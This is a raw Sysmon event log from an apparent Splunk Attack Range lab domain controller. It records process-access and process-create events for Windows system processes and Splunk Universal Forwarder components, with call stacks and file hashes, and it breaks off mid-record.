13:35:15.924{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.924{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4893-6000-5C05-000000009A01}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.924{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4893-6000-5C05-000000009A01}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.925{08A6967A-4893-6000-5C05-000000009A01}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4893-6000-5B05-000000009A01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4893-6000-5B05-000000009A01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.252{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4893-6000-5B05-000000009A01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:15.253{08A6967A-4893-6000-5B05-000000009A01}6168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4894-6000-5D05-000000009A01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4894-6000-5D05-000000009A01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.424{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4894-6000-5D05-000000009A01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.426{08A6967A-4894-6000-5D05-000000009A01}6992C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:16.080{08A6967A-4893-6000-5C05-000000009A01}4536824C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.643{08A6967A-4895-6000-5E05-000000009A01}59565220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4895-6000-5E05-000000009A01}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4895-6000-5E05-000000009A01}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:35:17.502{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4895-6000-5E05-000000009A01}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program 